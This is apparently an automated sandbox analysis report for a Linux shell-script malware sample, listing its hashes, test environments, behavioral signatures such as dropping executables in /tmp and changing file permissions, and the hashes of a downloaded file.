Analysis
-
max time kernel
41s -
max time network
129s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240508-en -
resource tags
arch:amd64, arch:i386, image:ubuntu1804-amd64-20240508-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system -
submitted
25/11/2024, 02:58
Static task
static1
Behavioral task
behavioral1
Sample
c78b647ade9f6fcdc7614af23afdba8f7d890fb77e1641e51349676eb9a41c01.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
c78b647ade9f6fcdc7614af23afdba8f7d890fb77e1641e51349676eb9a41c01.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
c78b647ade9f6fcdc7614af23afdba8f7d890fb77e1641e51349676eb9a41c01.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
c78b647ade9f6fcdc7614af23afdba8f7d890fb77e1641e51349676eb9a41c01.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
c78b647ade9f6fcdc7614af23afdba8f7d890fb77e1641e51349676eb9a41c01.sh
-
Size
10KB
-
MD5
48124ab0f7a89c1c97280cd1d95e50fc
-
SHA1
ff70079ce44da76abf68922c5f8361cd17d819a7
-
SHA256
c78b647ade9f6fcdc7614af23afdba8f7d890fb77e1641e51349676eb9a41c01
-
SHA512
5c4601fa8d6ced3bd753fdd73d4e4c272b96a0ee270f6b73aa0e9a24165e2be53a312c8e33de6e0817f5b1ef30ed39cd5382f14f10e2481c5049be72e593ed77
-
SSDEEP
96:u1/LCQIMnbDE0EIP464TrE0YgsvFMnbDE0yc0CgsdIP1t864TrE0pO3LCREo:u1/fI5IP464TrE0YWmPs64TrE0so
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97